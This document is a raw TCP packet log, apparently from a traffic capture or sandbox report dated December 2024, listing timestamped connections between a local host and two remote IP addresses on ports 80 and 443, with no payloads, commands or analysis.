                                                                                                                                                                                              Dec 16, 2024 01:01:42.691808939 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.691852093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.692930937 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.692981958 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.693063021 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.693110943 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.694099903 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.694152117 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.694230080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.694278002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.695269108 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.695329905 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.695409060 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.695456028 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.696491957 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.696543932 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.696616888 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.696662903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.697675943 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.697730064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.697793961 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.697841883 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.698859930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.698911905 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.698991060 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.699038029 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.700042009 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.700092077 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.700134993 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.700184107 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.701311111 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.701359987 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.701441050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.701492071 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.702440977 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.702497005 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.702516079 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.702567101 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.703624010 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.703677893 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.703762054 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.703808069 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.704813004 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.704864025 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.704947948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.704996109 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.706027031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.706077099 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.706155062 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.706204891 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.709372044 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.709429026 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.709460974 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.709501982 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.709511995 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.709580898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.709698915 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.709754944 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.709815979 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.709853888 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.709867001 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.709904909 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.710813999 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.710867882 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.710947037 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.710999012 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.712043047 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.712093115 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.712167025 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.712219000 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.713181019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.713233948 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.713308096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.713360071 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.732733011 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.732784986 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.732829094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.732829094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.732846975 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.732884884 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.732894897 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.732923031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.732938051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.732960939 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.732975006 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733012915 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733015060 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733055115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733061075 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733103991 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733294010 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733345985 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733346939 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733383894 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733397961 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733422041 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733438015 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733458996 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733474016 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733500957 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733509064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.733549118 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734288931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734340906 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734344959 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734380007 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734389067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734416962 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734431028 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734456062 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734467983 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734493017 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734503031 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734529972 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734541893 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.734580040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735347986 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735398054 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735403061 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735444069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735457897 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735482931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735496044 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735519886 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735534906 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735558987 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735569954 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735594988 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735611916 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735631943 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735647917 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.735681057 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.736005068 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.736042023 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.736057043 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.736079931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.736080885 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.736129045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741004944 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741030931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741049051 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741060019 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741089106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741089106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741374016 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741399050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741416931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741435051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741436958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741436005 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741466045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741482019 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741640091 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741667986 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741684914 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741686106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741703033 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741709948 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741722107 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741731882 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741739988 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741750956 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741763115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741770029 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741803885 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.741823912 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.742444038 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.742490053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.742558956 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.742604017 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.743048906 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.743096113 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.743336916 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.743388891 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.744465113 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.744513988 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.744575977 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.744626045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.745362997 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.745415926 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.760499001 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:42.760591984 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.760695934 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:42.766310930 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:42.766374111 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.875252008 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.875353098 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.875351906 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.875396967 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.875474930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.875524044 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.875694990 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.875745058 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.876107931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.876163960 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.877130032 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.877196074 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.877197981 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.877245903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.878113031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.878169060 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.878230095 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.878279924 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.879292011 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.879348993 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.879371881 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.879424095 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.880482912 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.880537987 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.880609035 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.880660057 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.881654978 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.881710052 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.881784916 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.881834984 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.882879972 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.882932901 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.883012056 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.883085966 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.884090900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.884144068 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.884183884 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.884231091 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.885261059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.885313034 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.885394096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.885445118 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.886538982 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.886589050 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.886647940 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.886698961 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.887679100 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.887733936 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.887736082 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.887783051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.888849974 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.888901949 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.889049053 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.889101028 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.890034914 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.890086889 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.890126944 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.890175104 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.891207933 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.891258001 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.891349077 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.891400099 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.892389059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.892438889 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.892510891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.892560959 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.893599033 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.893651009 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.893723965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.893774033 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.894798040 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.894850969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.894923925 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.894973993 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.895981073 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.896034002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.896107912 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.896159887 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.897181034 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.897233963 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.897310019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.897362947 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.898379087 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.898430109 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.898494005 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.898545027 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.899574995 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.899625063 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.899682045 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.899730921 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.900755882 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.900805950 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.900861025 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.900914907 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.901957989 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.902009964 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.902100086 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.902148962 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.903139114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.903188944 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.903238058 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.903286934 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.904334068 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.904385090 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.904469013 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.904517889 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.905651093 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.905698061 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.905706882 CET804984831.41.244.11192.168.2.4
